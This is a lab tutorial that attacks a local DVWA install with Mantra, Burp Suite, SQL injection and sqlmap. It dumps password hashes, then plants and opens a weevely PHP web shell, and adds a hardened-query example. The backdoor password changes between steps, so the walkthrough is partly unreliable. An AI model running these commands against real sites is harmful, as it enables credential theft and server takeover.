I will explain the Mantra tool in BackTrack 5. Mantra is the same as Firefox; the difference is that it includes tools used for hacking. With Mantra I can do information gathering and find vulnerabilities in a website or web application.
First, you must start Apache with the command:
root@bt:~# service apache2 start
To use Mantra, click the tool in the BackTrack menu. If you want to use it, you must activate the tool with the command:
root@bt:/pentest/web/mantra# ./OWASP\ Mantra
If Mantra starts successfully, it will be shown on screen [screenshot].
Then, for reporting, we use the Burp Suite tool. This tool describes the website in detail, because its report gives us a lot of information.
Now we use Mantra; don't forget to activate MySQL.
Then you must change the security setting from high to low. Why low? Because when security is low, we can find the vulnerabilities of the website or web application.
After changing the security setting, we move on to SQL injection. In the input field, enter 1 or 1 = 1 and submit.
Red text will then appear; this text is an error.
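
The SQL injection step above, as an added example that is not part of the original post: it assumes a lookup that pastes the id into the query unquoted, and uses a constructed users table in SQLite rather than DVWA's own code or data. It shows why 1 or 1 = 1 matches every row and how validating and binding the value stops it.

```python
import re
import sqlite3


def make_db():
    """Build a constructed users table (sample data, not DVWA's own)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")],
    )
    return db


def lookup_vulnerable(db, user_id):
    """Hypothetical lookup: the input is pasted into the SQL text itself."""
    # "1 or 1 = 1" becomes part of the WHERE clause, which is then always true.
    query = "SELECT first_name, last_name FROM users WHERE user_id = " + user_id
    return db.execute(query).fetchall()


def lookup_hardened(db, user_id):
    """Same lookup with input validation and a bound parameter."""
    # Reject anything that is not a plain decimal id before touching the DB.
    if not re.fullmatch(r"[0-9]+", user_id):
        return []
    # The value travels separately from the SQL text and is never parsed as SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 or 1 = 1"):
        print(repr(value), "vulnerable:", lookup_vulnerable(db, value))
        print(repr(value), "hardened:  ", lookup_hardened(db, value))
```
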
Don't forget to change the proxy: set it to “Use Proxy localhost for all urls”.
Burp Suite will then show the information [screenshot].
With the information we have obtained, we go to the sqlmap tool to find the hashed passwords and the results of the hashing. Use the command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0" --passwords
To list the existing databases, use the command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0" --dbs
To list the names of the existing tables, use the command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0" -D dvwa --tables
An alternative command to find the hashed passwords and the passwords that are not hashed:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0" -D dvwa -T users --dump
To create a backdoor with a password, we must first get permission. Use the command:
root@bt:~# chmod 777 -R /var/www/dvwa
Then we create the backdoor. Use the commands:
root@bt:~# cd /pentest/backdoors/web/weevely/
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate eddy /root/test.php
Then we send it to the victim. Use the command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=kto6o5phighh3m06vimv8hota0" --file-write=/root/test.php --file-dest=/var/www/dvwa/test.php
Then we try the backdoor that we made earlier; if successful, we will enter the web system. Use the command:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://localhost/dvwa/test.php jancok
Then we run the command ls.
OK, now we are in the system with the backdoor.